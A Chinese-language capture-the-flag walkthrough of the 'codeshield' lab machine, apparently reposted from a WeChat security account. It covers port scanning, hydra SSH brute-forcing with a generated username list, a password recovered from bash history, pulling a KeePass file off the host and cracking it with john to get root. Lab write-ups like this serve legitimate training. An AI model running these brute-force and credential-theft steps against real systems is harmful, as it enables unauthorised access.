【OSCP】codeshield

admin 2024年10月28日14:07:41评论6 views字数 2995阅读9分59秒阅读模式
【OSCP】codeshield

OSCP 靶场

【OSCP】codeshield

靶场介绍

codeshield

easy

信息收集、密码制作、hydra爆破、凭据收集、kdbx文件爆破、keepassxc使用

信息收集

主机发现

nmap -sn 192.168.1.0/24

【OSCP】codeshield

【OSCP】codeshield

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p- -T4 192.168.1.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-03 05:15 EST
Nmap scan report for 192.168.1.100
Host is up (0.00082s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http nginx
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd (Ubuntu)
443/tcp open ssl/http nginx
465/tcp open ssl/smtp Postfix smtpd
587/tcp open smtp Postfix smtpd
993/tcp open imaps?
995/tcp open pop3s?
2222/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3389/tcp open ms-wbt-server xrdp
22222/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:61:49:1F (Oracle VirtualBox virtual NIC)
Service Info: Hosts: -mail.codeshield.hmv, mail.codeshield.hmv; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.30 seconds

目录扫描

dirb https://192.168.1.100

【OSCP】codeshield

【OSCP】codeshield

权限获取

从ftp 中获取pdf,pdf 里面存在密码。

【OSCP】codeshield

【OSCP】codeshield

从网站中找用户名制作字典,然后 后台和ssh 进行爆破

【OSCP】codeshield

【OSCP】codeshield

angelina johnson
john doe
bob watson
jennifer cruise
kevin valdez
jessica carlson
mohammed mansour
xian tan
annabella cocci
thomas mitchell
patrick early

获取用户名后使用脚本生成字典

https://github.com/w0Tx/generate-ad-username

【OSCP】codeshield

hydra -L users.txt -P pass.txt ssh://192.168.1.100 -s 22222

【OSCP】codeshield

【OSCP】codeshield

权限提升

从valdezk 家目录下找到一个隐藏目录,发现存在密码

【OSCP】codeshield

【OSCP】codeshield

一个个尝试成功登录到mithchellt 用户,成功获取第一个flag

【OSCP】codeshield

在bash_histrory 历史记录中找到earlyp 用户的密码,尝试登录成功。

mitchellt@codeshield:~$ cat .bash_history 
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining ."
echo 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r /home/earlyp/Development/mining /tmp"
cp -r /tmp/mining .
ls
cd mining/
ls
exit
mitchellt@codeshield:~$ su earlyp
Password:
earlyp@codeshield:/home/mitchellt$ ls

在文档目录下发现存在一个加密的kdbx文件,下载后对其进行爆破

earlyp@codeshield:~/Documents$ ls -all
total 12
drwxr-xr-x 2 earlyp earlyp 4096 Aug 28 2023 .
drwxr-x--- 19 earlyp earlyp 4096 Aug 29 2023 ..
-rw------- 1 earlyp earlyp 1918 Aug 28 2023 Passwords.kdbx
earlyp@codeshield:~/Documents$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.103 - - [03/Mar/2024 14:58:21] "GET / HTTP/1.1" 200 -
192.168.1.103 - - [03/Mar/2024 14:58:25] "GET /Passwords.kdbx HTTP/1.1" 200 -

这里需要拿之前制作的字典才能爆破成功。

root㉿kali)-[~/下载]
└─# keepass2john Passwords.kdbx > hash

┌──(root㉿kali)-[~/下载]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt

──(root㉿kali)-[~/下载]
└─# john hash --wordlist=users.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 3225806 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mandalorian (Passwords)
1g 0:00:00:24 DONE (2024-03-03 10:09) 0.04110g/s 1.972p/s 1.972c/s 1.972C/s carlson.jessica..moh-man
Use the "--show" option to display all of the cracked passwords reliably

【OSCP】codeshield

获取密码后,读取数据库文件成功获取root 登录密码

https://app.keeweb.info

【OSCP】codeshield

我们也可以使用keepassxc 工具打开数据库文件

【OSCP】codeshield

【OSCP】codeshield

End

“点赞、在看与分享都是莫大的支持”

【OSCP】codeshield

【OSCP】codeshield

原文始发于微信公众号(贝雷帽SEC):【OSCP】codeshield

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月28日14:07:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【OSCP】codeshieldhttps://cn-sec.com/archives/3316931.html

发表评论

匿名网友 填写信息